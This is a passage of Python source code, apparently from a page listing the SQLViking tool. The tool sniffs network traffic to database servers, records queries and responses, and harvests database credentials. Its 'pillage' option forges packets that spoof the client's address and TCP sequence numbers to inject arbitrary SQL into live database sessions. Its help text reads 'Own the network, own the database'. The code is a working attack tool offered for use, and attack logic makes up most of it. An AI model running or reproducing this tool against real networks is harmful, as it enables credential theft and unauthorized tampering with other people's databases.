Scout(threading.Thread): 125 | def __init__(self,interface="eth0"): 126 | threading.Thread.__init__(self) 127 | self.knownDatabases = [] 128 | self.die = False 129 | self.interface = interface 130 | 131 | def run(self): 132 | lfilter = lambda (r): TCP in r 133 | while not self.die: 134 | while not dbQueue2.empty(): 135 | self.knownDatabases.append(dbQueue2.get()) 136 | try: 137 | sniff(prn=pktQueue.put,filter="tcp",store=0,timeout=5,iface=self.interface) 138 | #sniff(prn=self.putPkt,filter="tcp",store=0,timeout=5,iface=self.interface) 139 | except: 140 | print sys.exc_info()[1] 141 | self.die = True 142 | 143 | #for debugging, offloaded logic into Parse.getConn() func to keep from bogging down this thread 144 | #def putPkt(self,pkt): 145 | # for db in self.knownDatabases: 146 | # if (pkt[IP].src == db.ip and pkt[TCP].sport == db.sport) or (pkt[IP].dst == db.ip and pkt[TCP].dport == db.port): 147 | # pktQueue.put(pkt) 148 | 149 | class Parse(threading.Thread): 150 | def __init__(self,interface="eth0",debug=False): 151 | threading.Thread.__init__(self) 152 | self.die = False 153 | self.toInject = [] 154 | self.knownDatabases = [] 155 | self.knownConns = [] 156 | self.fingerprint = False 157 | self.interface = interface 158 | self.debug = debug 159 | 160 | def getNumQueries(self): 161 | l = 0 162 | for db in self.knownDatabases: 163 | l += len(db.traffic) 164 | return l 165 | 166 | def getNumConns(self): 167 | return len(self.knownConns) 168 | 169 | def getNumDBs(self): 170 | return len(self.knownDatabases) 171 | 172 | def dprint(self,s): 173 | if self.debug == 'True': 174 | print(s) 175 | 176 | def dumpResults(self): 177 | data = [] 178 | for db in self.knownDatabases: 179 | data.append(db.getTraffic()) 180 | return data 181 | 182 | def run(self): 183 | global dbQueue1,injectionQueue,pktQueue 184 | while not self.die: 185 | while not dbQueue1.empty(): 186 | self.knownDatabases.append(dbQueue1.get()) 187 | while not injectionQueue.empty(): 188 | self.toInject.append(injectionQueue.get()) 189 | if not pktQueue.empty(): 190 | self.handle(pktQueue.get()) 191 | #for db in self.knownDatabases: 192 | # print db.getTraffic(HUMAN) 193 | 194 | def getConn(self,pkt): 195 | for c in self.knownConns: 196 | if pkt[IP].src == c.cip and pkt[IP].dst == c.sip and pkt[TCP].sport == c.cport and pkt[TCP].dport == c.sport: #is req 197 | return c 198 | elif pkt[IP].src == c.sip and pkt[IP].dst == c.cip and pkt[TCP].sport == c.sport and pkt[TCP].dport == c.cport: #is resp 199 | return c 200 | 201 | for db in self.knownDatabases: 202 | if pkt[IP].src == db.ip and pkt[TCP].sport == db.port: #new resp 203 | c = Conn(cip=pkt[IP].dst,cport=pkt[TCP].dport,sip=db.ip,sport=db.port,state=None,db=db) 204 | self.knownConns.append(c) 205 | return c 206 | elif pkt[IP].dst == db.ip and pkt[TCP].dport == db.port: #new req 207 | c = Conn(cip=pkt[IP].src,cport=pkt[TCP].sport,sip=db.ip,sport=db.port,state=None,db=db) 208 | self.knownConns.append(c) 209 | return c 210 | 211 | if self.fingerprint: 212 | return #todo 213 | 214 | def parse(self,conn): 215 | payload = '' 216 | for p in conn.frag: 217 | payload += str(p[TCP].payload) 218 | 219 | if conn.frag[0][IP].src == conn.sip and conn.frag[0][TCP].sport == conn.sport: #is response 220 | conn.storeTraffic(DATABASELIST[conn.db.dbType].parseResp(payload,conn),RESPONSE) 221 | else: #is request 222 | conn.storeTraffic(DATABASELIST[conn.db.dbType].parseReq(payload,conn),REQUEST) 223 | 224 | conn.frag = [] 225 | 226 | def handle(self,pkt): 227 | #even with TCP filter set on scapy, will occassionally get packets 228 | #with no TCP layer (or maybe an empty TCP layer?). throws exception and breaks thread. 229 | pkts = [] 230 | try: 231 | pkt[TCP] 232 | except: 233 | return 234 | 235 | c = self.getConn(pkt) 236 | if c is None: 237 | return 238 | 239 | if pkt[TCP].flags == 24: #don't inject after fragged pkt, we'll lose that race 240 | for i in self.toInject: 241 | #self.printLn("[1] %s %s %s %s %s %s"%(c.db.ip,i[1],c.db.port,i[2],pkt[TCP].sport,pkt[TCP].flags)) 242 | if c.db.ip == i[1] and c.db.port == i[2] and pkt[TCP].sport == i[2]: #make sure to inject after db response to increase likelihood of success 243 | #self.printLn("[2] attempting injection") 244 | #self.printLn(databaseList[c.db.dbType].encodeQuery(i[0]).encode('hex')) 245 | #sendp(Ether(dst=pkt[Ether].src,src=pkt[Ether].dst)/IP(dst=i[1],src=c.cip)/TCP(sport=c.cport,dport=i[2],flags=16,seq=c.nextcseq,ack=pkt[TCP].seq+len(pkt[TCP].payload))) 246 | sendp(Ether(dst=pkt[Ether].src,src=pkt[Ether].dst)/IP(dst=i[1],src=c.cip)/TCP(sport=c.cport,dport=i[2],flags=24,seq=c.nextcseq,ack=pkt[TCP].seq+len(pkt[TCP].payload))/DATABASELIST[c.db.dbType].encodeQuery(i[0]),iface=self.interface) 247 | self.toInject.remove(i) 248 | 249 | #check for TCP control packets 250 | if pkt[TCP].flags == 17: #FIN/ACK pkt 251 | self.knownConns.remove(c) 252 | return 253 | elif pkt[TCP].flags == 2: #SYN pkt 254 | c.nextcseq = pkt[TCP].seq+1 255 | c.state = HANDSHAKE 256 | return 257 | 258 | #TODO: invesitgate this further; are these ACK pkts? 259 | #empty pkt, no reason to parse. scapy sometimes returns empty pkts with [tcp].payload of several '0' values 260 | if len(pkt[TCP].payload) == 0 or (len(pkt[TCP].payload) <= 16 and str(pkt[TCP].payload).encode('hex') == '00'*len(pkt[TCP].payload)): 261 | return 262 | 263 | # this destroys any kind of out-of-order fault tolerance. need to rethink. 264 | #if pkt[IP].src == c.cip and pkt[TCP].sport == c.cport and c.nextcseq != -1 and c.nextcseq != pkt[TCP].seq: #is a bad req 265 | # return 266 | #elif pkt[IP].dst == c.cip and pkt[TCP].dport == c.cport and c.nextsseq != -1 and c.nextsseq != pkt[TCP].seq: #is a bad resp 267 | # return 268 | 269 | c.frag.append(pkt) 270 | if (pkt[TCP].flags >> 3) % 2 == 0: 271 | return 272 | self.parse(c) 273 | 274 | if pkt[IP].src == c.cip and pkt[TCP].sport == c.cport: 275 | c.nextcseq = len(pkt[TCP].payload)+pkt[TCP].seq 276 | else: 277 | c.nextsseq = len(pkt[TCP].payload)+pkt[TCP].seq 278 | 279 | def dprint(s): 280 | global settings 281 | if settings['debug']: 282 | print(s) 283 | 284 | def parseConfig(f): 285 | settings = {} 286 | 287 | with open(f,'r') as f: 288 | for line in f: 289 | line = line.split('#')[0].strip() 290 | if len(line) == 0: 291 | # Skip empty lines 292 | continue 293 | 294 | # Check if new settings section began 295 | section_match = re.match("^\[[^\[\]]*\]$", line) 296 | if section_match: 297 | current_section = section_match.string 298 | continue 299 | 300 | if current_section == "[Databases]": 301 | try: 302 | db_type, ip, port = line.split(':') 303 | except: 304 | print("Check correctness of the settings file. " 305 | "Couldn't parse the follwing line:\n{}".format( 306 | line)) 307 | sys.exit(1) 308 | #dprint('[?] Parsing line for db info:\t%s'%l) 309 | dbQueue1.put(Database( 310 | db_type, 311 | ip.strip(), 312 | int(port) 313 | )) 314 | dbQueue2.put(Database( 315 | db_type, 316 | ip, 317 | port 318 | )) 319 | elif current_section == "[Injection]": 320 | injectionQueue.put(line) 321 | elif current_section == "[Data]" or current_section == "[Misc]": 322 | try: 323 | key, value = line.split('=') 324 | except: 325 | print("Check correctness of the settings file. " 326 | "Couldn't parse the follwing line:\n{}".format( 327 | line)) 328 | sys.exit(1) 329 | 330 | settings[key.strip()] = value.strip() 331 | 332 | return settings 333 | 334 | 335 | def isValidIP(ip): 336 | if len(ip.split('.')) != 4: 337 | return False 338 | for oct in ip.split('.'): 339 | try: 340 | if int(oct) < 0 or int(oct) > 256: 341 | return False 342 | except ValueError: 343 | return False 344 | return True 345 | 346 | def isValidPort(port): 347 | try: 348 | if int(port) < 0 or int(port) > 65565: 349 | return False 350 | except ValueError: 351 | return False 352 | return True 353 | 354 | def isValidDbType(dbType): 355 | if dbType in DATABASELIST: 356 | return True 357 | else: 358 | return False 359 | 360 | def writeResults(t): 361 | global settings 362 | print('[*] Enter filepath to write to:') 363 | path = raw_input("> ") 364 | data = formatData(t.dumpResults(), settings['format']) 365 | with open(path,'w') as f: 366 | f.write(data) 367 | try: 368 | print('[*] Data saved to: %s'%path) 369 | except: 370 | print('[!] Unable to save to file: %s'%path) 371 | print('Error: %s'%sys.exc_info()[0]) 372 | time.sleep(5) 373 | printMainMenu(t) 374 | 375 | def formatData(rawData,format): 376 | data = '' 377 | if format.upper() == 'HUMAN': 378 | for db in rawData: 379 | data += '\n%s%s@%s:%s%s\n\n'%('-'*20,db['type'],db['ip'],db['port'],'-'*20) 380 | data += 'Credentials:\n' 381 | if len(db['credentials']) > 0: 382 | for u,p in db['credentials'].iteritems(): 383 | data += '\t%s : %s\n'%(u,p) 384 | else: 385 | data += 'No credentials harvested\n' 386 | 387 | data += '\nInstances:\n' 388 | if len(db['instances']) > 0: 389 | for instanceName,instance in db['instances'].iteritems(): 390 | data += '%s\n'%instanceName 391 | for tableName,table in instance.tables.iteritems(): 392 | data += '\t%s:\t%s\n'%(tableName, ', '.join(table.columns)) 393 | else: 394 | data += 'No instances identified\n' 395 | 396 | data += '\nTraffic:\n' 397 | for t in db['traffic']: 398 | data += '\n--Timestamp--\n%s\n'%t.timestamp 399 | data += '--Request--\n' 400 | if t.query: 401 | for q in t.query: 402 | data += '%s\n'%q 403 | else: 404 | data += 'None\n' 405 | data += '--Response--\n' 406 | if t.result: 407 | for r in t.result: 408 | data += '%s\n'%r 409 | else: 410 | data += 'None\n' 411 | elif format.upper() == 'JSON': 412 | for db in rawData: 413 | for i in range(len(db['traffic'])): 414 | db['traffic'][i] = vars(db['traffic'][i]) 415 | for i in range(len(db['instances'])): 416 | for k,v in db['instances'][i].iteritems(): 417 | db['instances'][i][k] = vars(v) 418 | print('data: %s'%rawData) 419 | data = dumps(rawData) 420 | return data 421 | 422 | def addDb(t): 423 | ip = '' 424 | port = '' 425 | dbtype = '' 426 | 427 | while(not isValidIP(ip)): 428 | print('[*] Enter IP of DB') 429 | ip = raw_input('> ') 430 | while(not isValidPort(port)): 431 | print('[*] Enter port of DB') 432 | port = raw_input('> ') 433 | while(not isValidDbType(dbtype)): 434 | print('[*] Enter type of DB') 435 | dbtype = raw_input('> ').upper() 436 | 437 | dbQueue1.put(Database(ip=ip,port=port,dbType=dbtype)) 438 | 439 | def pillage(): 440 | global queries 441 | print('[*] Enter query to execute:') 442 | query = raw_input("> ") 443 | print('[*] Enter IP to execute against:') 444 | ip = raw_input("> ") 445 | print('[*] Enter port to execute against:') 446 | port = raw_input("> ") 447 | print('[*] Run "%s" against %s:%s? [y/n]'%(query,ip,port)) 448 | ans = raw_input("> ") 449 | if ans.lower() == 'y': 450 | injectionQueue.put([query,ip,int(port)]) 451 | print('[*] Query will run as soon as possible') 452 | else: 453 | print('[*] Cancelling...') 454 | time.sleep(1) 455 | 456 | def parseInput(input,t): 457 | if input == 'w': 458 | writeResults(t) 459 | elif input == 'r': 460 | pillage() 461 | elif input == 'a': 462 | addDb(t) 463 | elif input == 'q': 464 | raise KeyboardInterrupt 465 | else: 466 | print('Unknown command entered') 467 | 468 | def wipeScreen(): 469 | y,x = os.popen('stty size', 'r').read().split() 470 | print('\033[1;1H') 471 | for i in range(0,int(y)): 472 | print(' '*int(x)) 473 | print('\033[1;1H') 474 | 475 | class AlarmException(Exception): 476 | pass 477 | 478 | def alarmHandler(signum, frame): 479 | raise AlarmException 480 | 481 | def nonBlockingRawInput(t, prompt='> ', timeout=5): 482 | signal.signal(signal.SIGALRM, alarmHandler) 483 | signal.alarm(timeout) 484 | try: 485 | text = raw_input(prompt) 486 | signal.alarm(0) 487 | parseInput(text,t) 488 | except AlarmException: 489 | printMainMenu(t) 490 | signal.signal(signal.SIGALRM,signal.SIG_IGN) 491 | 492 | def printMainMenu(t,wipe=True): 493 | if wipe: 494 | wipeScreen() 495 | y,x = os.popen('stty size', 'r').read().split() 496 | 497 | print('{{:^{}}}'.format(x).format('===SQLViking===')) 498 | print('\n[*] Current number of known DBs:\t\t%s'%t.getNumDBs()) 499 | print('[*] Current number of known connections:\t%s'%t.getNumConns()) 500 | print('[*] Current number of queries capured:\t\t%s'%t.getNumQueries()) 501 | print('\n[*] Menu Items:') 502 | print('\tw - dump current results to file specified') 503 | print('\ta - add new DB to track') 504 | print('\tr - run a query against a specified DB') 505 | print('\tq - quit') 506 | 507 | def main(): 508 | global settings 509 | 510 | parser = argparse.ArgumentParser(description='Own the network, own the database', prog='sqlviking.py', usage='%(prog)s [-v] -c ', formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=65, width =150)) 511 | parser.add_argument('-v', '--verbose', action='store_true', help='Turn on verbose mode; will print out all captured traffic') 512 | parser.add_argument('-c', '--configfile', default='sqlviking.conf', help='Config file location, defaults to sqlviking.conf') 513 | args = parser.parse_args() 514 | 515 | try: 516 | settings = parseConfig(args.configfile) 517 | except IOError: 518 | print('[!] Error reading config file. Exiting...') 519 | sys.exit(0) 520 | 521 | t1 = Scout(settings['interface']) 522 | t2 = Parse(interface=settings['interface'],debug=settings['debug']) 523 | t1.start() 524 | t2.start() 525 | 526 | #printMainMenu(t2) 527 | #while True: 528 | # nonBlockingRawInput(t2) 529 | 530 | try: 531 | printMainMenu(t2) 532 | while True: 533 | nonBlockingRawInput(t2) 534 | except KeyboardInterrupt: 535 | print('\n[!] Shutting down...') 536 | t1.die = True 537 | t2.die = True 538 | except: 539 | t1.die = True 540 | t2.die = True 541 | #print sys.exc_info()[1] 542 | for e in sys.exc_info(): 543 | print e 544 | 545 | if __name__ == "__main__": 546 | main() 547 | --------------------------------------------------------------------------------
NameMessage
<%= comment.name %><%= comment.message.gsub("\n", "
") %>